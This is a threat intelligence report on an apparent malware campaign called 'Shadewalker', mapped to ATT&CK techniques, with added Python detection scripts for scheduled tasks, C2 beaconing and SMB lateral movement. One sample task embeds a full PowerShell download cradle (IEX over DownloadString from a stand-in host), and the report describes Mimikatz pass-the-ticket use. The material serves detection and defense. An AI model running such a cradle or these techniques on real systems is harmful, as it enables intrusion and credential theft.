Alex Morgan — Threat Intelligence Analyst
Key Takeaways
- The ‘Shadewalker’ malware relies on social engineering for initial access: a macro-enabled decoy document that masquerades as a legitimate file.
- Execution relies heavily on PowerShell (T1059.001 – Command and Scripting Interpreter: PowerShell); persistence is provided by a scheduled task (T1053.005), not by the scripts themselves.
- Command and Control (C2) infrastructure was dynamic: HTTPS to dynamic DNS domains, at times on non-standard ports, so that C2 traffic blends into ordinary web traffic.
Executive Summary
During our analysis of the ‘Shadewalker’ malware strain, we uncovered a sophisticated attack chain characterized by its stealthy behavior and evasive tactics. The campaign appears to target organizations in various sectors, with a focus on data exfiltration and cyber espionage. Our investigation into the unique TTPs employed by the actor revealed a clear intent to maintain a prolonged presence within victim networks while minimizing detection.
Initial Access
Initial access was achieved through phishing emails carrying a macro-enabled decoy document. When the document was opened it prompted the user to enable macros; the macro then launched a PowerShell download cradle (T1059.001 – Command and Scripting Interpreter: PowerShell) that fetched the payload from a remote server. The chain depends on the user enabling macros, so blocking macros in documents that arrived from the internet, and alerting on powershell.exe spawned by an Office process, both break it at the first step.
Execution & Persistence
After initial access, execution relied heavily on PowerShell. The first-stage script downloaded and executed a secondary payload, giving the actor a foothold that no longer depended on the document. For persistence the implant registered a scheduled task (T1053.005 – Scheduled Task/Job) whose definition was written to C:\Windows\System32\Tasks\Shadewalker; the task re-launched the implant after reboots and on a schedule, so the C2 connection was re-established without further user interaction. Because task definitions are stored as XML files in that directory, a hunt for this family can start by inspecting any task whose action is a script host.
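The following is an added example, not code from the original report or from the Shadewalker sample: it parses scheduled task definitions of the kind stored under C:\Windows\System32\Tasks and flags tasks whose action is a script host, decoding any -EncodedCommand payload (base64 over UTF-16LE, which is what PowerShell expects) so the analyst sees the download cradle in clear text. The two task definitions, the task names, the hostname in the cradle and the thresholds are constructed for the example.

```python
import base64
import ntpath
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace (fixed, documented by Microsoft).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed download cradle, encoded the way -EncodedCommand expects it:
# base64 over the UTF-16LE bytes of the script. The host name is hypothetical.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('https://cdn.example.invalid:8443/u')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

# Constructed task definitions keyed by the path the Task Scheduler stores
# them at. Neither is an artefact from the original report.
SAMPLE_TASKS = {
    r"C:\Windows\System32\Tasks\Shadewalker": f"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <BootTrigger><Enabled>true</Enabled></BootTrigger>
    <TimeTrigger>
      <Repetition><Interval>PT10M</Interval></Repetition>
      <StartBoundary>2024-01-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoP -W Hidden -Enc {ENCODED}</Arguments>
    </Exec>
  </Actions>
</Task>""",
    r"C:\Windows\System32\Tasks\Microsoft\Windows\Defrag\ScheduledDefrag": r"""
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger><ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\system32\defrag.exe</Command>
      <Arguments>-c -h -o -$</Arguments>
    </Exec>
  </Actions>
</Task>""",
}

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# -EncodedCommand and the unambiguous abbreviations PowerShell accepts for it.
ENC_SWITCH = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)")
CRADLE_RE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|net\.webclient")
HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")


def decode_encoded_command(arguments: str):
    """Return the script hidden behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_SWITCH.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_task(path: str, xml_text: str) -> dict:
    """Parse one task definition and return its action, triggers and findings."""
    root = ET.fromstring(xml_text.strip())
    exec_node = root.find("t:Actions/t:Exec", NS)
    command = arguments = ""
    if exec_node is not None:
        command = exec_node.findtext("t:Command", default="", namespaces=NS).strip()
        arguments = exec_node.findtext("t:Arguments", default="", namespaces=NS).strip()
    triggers_node = root.find("t:Triggers", NS)
    triggers = [t.tag.rpartition("}")[2] for t in triggers_node] if triggers_node is not None else []
    interval = root.findtext(".//t:Repetition/t:Interval", default="", namespaces=NS)
    decoded = decode_encoded_command(arguments)

    findings = []
    binary = ntpath.basename(command).lower()
    if binary in SCRIPT_HOSTS:
        findings.append(f"script host as task action: {binary}")
    if decoded is not None:
        findings.append("encoded PowerShell command")
    if HIDDEN_RE.search(arguments):
        findings.append("hidden window")
    if CRADLE_RE.search(decoded or arguments):
        findings.append("download cradle")
    # Trigger shape is context, not evidence on its own: report it only when
    # the action already looks wrong, otherwise every boot-time task would fire.
    if findings and ("BootTrigger" in triggers or "LogonTrigger" in triggers):
        findings.append("runs at boot/logon")
    if findings and interval:
        findings.append(f"repeats every {interval}")
    return {"path": path, "command": command, "arguments": arguments,
            "decoded": decoded, "triggers": triggers, "findings": findings}


def hunt(tasks: dict) -> list:
    """Return the analysis record of every task with at least one finding."""
    return [r for r in (analyze_task(p, x) for p, x in tasks.items()) if r["findings"]]


if __name__ == "__main__":
    for rec in hunt(SAMPLE_TASKS):
        print(rec["path"])
        for finding in rec["findings"]:
            print("  -", finding)
        if rec["decoded"]:
            print("  decoded:", rec["decoded"])
```

On a live system the same logic runs over the files in C:\Windows\System32\Tasks (they are UTF-16 encoded on disk, so open them with that encoding before parsing). The benign Defrag task produces no findings even though it is scheduled, because trigger shape is only reported alongside a suspicious action.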
Command and Control
The actor established resilient C2 communications to control compromised assets. We identified HTTPS requests to domains registered through dynamic DNS providers; commands and results were base64-encoded inside the requests and responses, and some connections used non-standard ports rather than 443. Dynamic DNS let the actor repoint the hostnames without changing the implant, which complicates blocklist-based detection. The implant beaconed every 10 minutes with little jitter, consistent with T1071.001 – Application Layer Protocol: Web Protocols; the near-constant polling interval is itself a detection opportunity, since it stands out against the irregular timing of ordinary web traffic.
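The following is an added example, not code from the original report: it runs the beacon check described above over constructed proxy records, grouping requests by (source, destination, port), computing the mean inter-request interval and its relative jitter, and flagging flows that poll at a near-constant interval, while also noting whether the port is a standard web port. The log lines, hostnames and thresholds are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed egress records (not from the original report):
# time, source host, destination, destination port, method, path.
# WS-017 talks to a hypothetical dynamic-DNS name on 8443 every ~10 minutes
# and to ordinary sites at irregular times.
SAMPLE_LOG = """\
2024-03-04T09:00:02Z WS-017 upd-17.ddns.example.invalid 8443 POST /api/v1/ping
2024-03-04T09:03:11Z WS-017 www.example.com 443 GET /
2024-03-04T09:03:14Z WS-017 www.example.com 443 GET /assets/app.js
2024-03-04T09:03:15Z WS-017 www.example.com 443 GET /assets/app.css
2024-03-04T09:10:05Z WS-017 upd-17.ddns.example.invalid 8443 POST /api/v1/ping
2024-03-04T09:15:00Z WS-017 login.example.net 443 POST /auth
2024-03-04T09:20:01Z WS-017 upd-17.ddns.example.invalid 8443 POST /api/v1/ping
2024-03-04T09:27:40Z WS-017 www.example.com 443 GET /news
2024-03-04T09:30:08Z WS-017 upd-17.ddns.example.invalid 8443 POST /api/v1/ping
2024-03-04T09:40:03Z WS-017 upd-17.ddns.example.invalid 8443 POST /api/v1/ping
2024-03-04T09:45:00Z WS-017 login.example.net 443 POST /auth
2024-03-04T09:50:06Z WS-017 upd-17.ddns.example.invalid 8443 POST /api/v1/ping
2024-03-04T09:52:08Z WS-017 www.example.com 443 GET /
2024-03-04T09:52:09Z WS-017 www.example.com 443 GET /assets/app.js
2024-03-04T10:00:02Z WS-017 upd-17.ddns.example.invalid 8443 POST /api/v1/ping
"""

STANDARD_WEB_PORTS = {80, 443}


def parse_log(text: str) -> dict:
    """Group request timestamps by (source, destination, port)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, *_ = line.split()
        flows[(src, dst, int(port))].append(datetime.fromisoformat(ts.replace("Z", "+00:00")))
    return flows


def beacon_score(times: list, min_hits: int = 5):
    """Mean interval and relative jitter (stdev/mean) for one flow; None if too few hits."""
    if len(times) < min_hits:
        return None
    times = sorted(times)
    deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    avg = mean(deltas)
    if avg <= 0:
        return None
    return {"hits": len(times), "interval_s": round(avg), "jitter": round(pstdev(deltas) / avg, 3)}


def find_beacons(flows: dict, max_jitter: float = 0.2, min_hits: int = 5) -> list:
    """Flag flows whose inter-request intervals are nearly constant."""
    hits = []
    for (src, dst, port), times in flows.items():
        score = beacon_score(times, min_hits)
        if score and score["jitter"] <= max_jitter:
            score.update(src=src, dst=dst, port=port,
                         nonstandard_port=port not in STANDARD_WEB_PORTS)
            hits.append(score)
    return sorted(hits, key=lambda s: s["jitter"])


if __name__ == "__main__":
    for b in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{b['src']} -> {b['dst']}:{b['port']} every ~{b['interval_s']}s "
              f"(jitter {b['jitter']}, {b['hits']} hits, non-standard port: {b['nonstandard_port']})")
```

The browsing flows to www.example.com have as many hits as the beacon but bursty timing, so their jitter is far above the threshold and they are not reported. Implants that randomise their sleep defeat a strict jitter cut-off; raising max_jitter and lengthening the observation window trades false positives for coverage of that case.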
Lateral Movement & Discovery
From the initial host the malware moved laterally. The operator first enumerated SMB shares on the local network, then used T1021.002 – SMB/Windows Admin Shares to reach other hosts over administrative shares such as ADMIN$ and C$. Mimikatz was downloaded for credential harvesting; we observed it being used to extract Kerberos tickets, which were then replayed (pass-the-ticket) to impersonate users across domains and obtain privileged access to additional network resources.
Impact & Objectives
The primary objectives of the Shadewalker campaign were reconnaissance and data exfiltration, targeting sensitive data on endpoints and shared drives. We found logs indicating the transfer of substantial volumes of data to external FTP servers, a channel separate from the HTTPS C2 and one that is easy to spot where outbound FTP from workstations is not normal. The data appears to consist of both intellectual property and sensitive employee information, with consequences for both operational security and regulatory compliance.
MITRE ATT&CK Mapping
- T1071.001 – Application Layer Protocol: Web Protocols: Utilizing web protocols to establish command and control communications.
- T1059.001 – Command and Scripting Interpreter: PowerShell: Executing the download cradle and the subsequent payload stages.
- T1053.005 – Scheduled Task/Job: Creating tasks to maintain persistence across system reboots.
- T1021.002 – SMB/Windows Admin Shares: Leveraging SMB for lateral movement within the network.
Detection Opportunities
- Turn on PowerShell Script Block Logging (event ID 4104) and Module Logging, and alert on script blocks that contain -EncodedCommand, download cradles (DownloadString, Invoke-WebRequest, IEX) or hidden-window switches, and on powershell.exe spawned by an Office application.
- Alert on scheduled task creation (event ID 4698) whose action is a script host, and periodically compare the task definitions under C:\Windows\System32\Tasks against a known-good baseline.
- Monitor egress for C2 traffic patterns: TLS to dynamic DNS domains, HTTPS on non-standard ports, fixed-interval beacons from a single host, and FTP sessions to external addresses.
- Audit credential usage and lateral movement: one account producing network logons (event ID 4624, logon type 3) on many hosts within a short window, ADMIN$ or C$ access (event ID 5140) from workstations, and process access to LSASS, which is how Mimikatz harvests credentials.
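The following is an added example, not code from the original report: it applies the lateral-movement checks from the list above to constructed Windows Security event records, flagging an account that produces network logons on many hosts inside a short window (fan-out) and an (account, source host) pair that opens ADMIN$ or C$ on several hosts, then correlates the two. Event fields are reduced to those the checks need; accounts, hosts, timestamps and thresholds are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security events (not from the original report), reduced
# to the fields that matter: 4624 network logons (logon type 3) as recorded on
# the destination host, and 5140 share accesses. Account and host names are
# hypothetical. svc_backup fans out from WS-017 across six hosts in a few
# minutes and opens ADMIN$/C$; j.doe shows ordinary file-share use.
EVENTS = [
    {"time": "2024-03-04T09:15:00", "id": 4624, "host": "FS-01", "user": "j.doe", "src": "WS-005", "logon_type": 3},
    {"time": "2024-03-04T09:15:10", "id": 5140, "host": "FS-01", "user": "j.doe", "src": "WS-005", "share": "Projects"},
    {"time": "2024-03-04T10:01:00", "id": 4624, "host": "FS-01", "user": "svc_backup", "src": "WS-017", "logon_type": 3},
    {"time": "2024-03-04T10:01:30", "id": 5140, "host": "FS-01", "user": "svc_backup", "src": "WS-017", "share": "ADMIN$"},
    {"time": "2024-03-04T10:02:10", "id": 4624, "host": "FS-02", "user": "svc_backup", "src": "WS-017", "logon_type": 3},
    {"time": "2024-03-04T10:02:40", "id": 5140, "host": "FS-02", "user": "svc_backup", "src": "WS-017", "share": "ADMIN$"},
    {"time": "2024-03-04T10:03:05", "id": 4624, "host": "HR-DB", "user": "svc_backup", "src": "WS-017", "logon_type": 3},
    {"time": "2024-03-04T10:03:35", "id": 5140, "host": "HR-DB", "user": "svc_backup", "src": "WS-017", "share": "C$"},
    {"time": "2024-03-04T10:04:20", "id": 4624, "host": "WS-022", "user": "svc_backup", "src": "WS-017", "logon_type": 3},
    {"time": "2024-03-04T10:05:50", "id": 4624, "host": "WS-031", "user": "svc_backup", "src": "WS-017", "logon_type": 3},
    {"time": "2024-03-04T10:06:30", "id": 4624, "host": "DC-01", "user": "svc_backup", "src": "WS-017", "logon_type": 3},
    {"time": "2024-03-04T10:07:00", "id": 5140, "host": "DC-01", "user": "svc_backup", "src": "WS-017", "share": "ADMIN$"},
    {"time": "2024-03-04T14:40:00", "id": 4624, "host": "PRINT-01", "user": "j.doe", "src": "WS-005", "logon_type": 3},
    {"time": "2024-03-04T14:40:05", "id": 5140, "host": "PRINT-01", "user": "j.doe", "src": "WS-005", "share": "print$"},
]

ADMIN_SHARES = {"ADMIN$", "C$"}


def detect_fanout(events, min_hosts=5, window=timedelta(minutes=10)):
    """One account reaching >= min_hosts distinct hosts over the network inside one window."""
    by_user = defaultdict(list)
    for e in events:
        if e["id"] == 4624 and e.get("logon_type") == 3:
            by_user[e["user"]].append((datetime.fromisoformat(e["time"]), e["host"]))
    alerts = []
    for user, logons in by_user.items():
        logons.sort()
        for i, (start, _) in enumerate(logons):
            hosts = {h for t, h in logons[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"user": user, "start": start.isoformat(), "hosts": sorted(hosts)})
                break  # one alert per account; the analyst pivots from there
    return alerts


def detect_admin_share_use(events, min_hosts=3):
    """One (account, source host) pair opening ADMIN$ or C$ on >= min_hosts hosts."""
    touched = defaultdict(set)
    for e in events:
        if e["id"] == 5140 and e.get("share", "").upper() in ADMIN_SHARES:
            touched[(e["user"], e["src"])].add(e["host"])
    return [{"user": u, "src": s, "hosts": sorted(h)}
            for (u, s), h in touched.items() if len(h) >= min_hosts]


def correlate(events):
    """Accounts that both fan out and use admin shares: the strongest T1021.002 candidates."""
    fan = {a["user"] for a in detect_fanout(events)}
    adm = {a["user"] for a in detect_admin_share_use(events)}
    return sorted(fan & adm)


if __name__ == "__main__":
    for a in detect_fanout(EVENTS):
        print(f"fan-out: {a['user']} reached {len(a['hosts'])} hosts from {a['start']}: {', '.join(a['hosts'])}")
    for a in detect_admin_share_use(EVENTS):
        print(f"admin shares: {a['user']} from {a['src']} on {', '.join(a['hosts'])}")
    print("correlated:", correlate(EVENTS))
```

Backup and management accounts legitimately touch many hosts, so in production the thresholds are set per account class and known administration hosts are allow-listed as sources; the correlation of fan-out with admin-share access is what separates an operator pivoting with stolen credentials from a noisy but benign service.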
Analyst Notes
The Shadewalker campaign represents a complex and multi-faceted threat that leverages social engineering, advanced scripting, and stealthy lateral movement techniques. Organizations should prioritize user training on phishing awareness and establish robust logging and monitoring protocols to mitigate the risks associated with such sophisticated threats. Continuous vigilance and proactive threat hunting are essential to defend against evolving tactics employed by actors behind campaigns like these.
Source: Original Report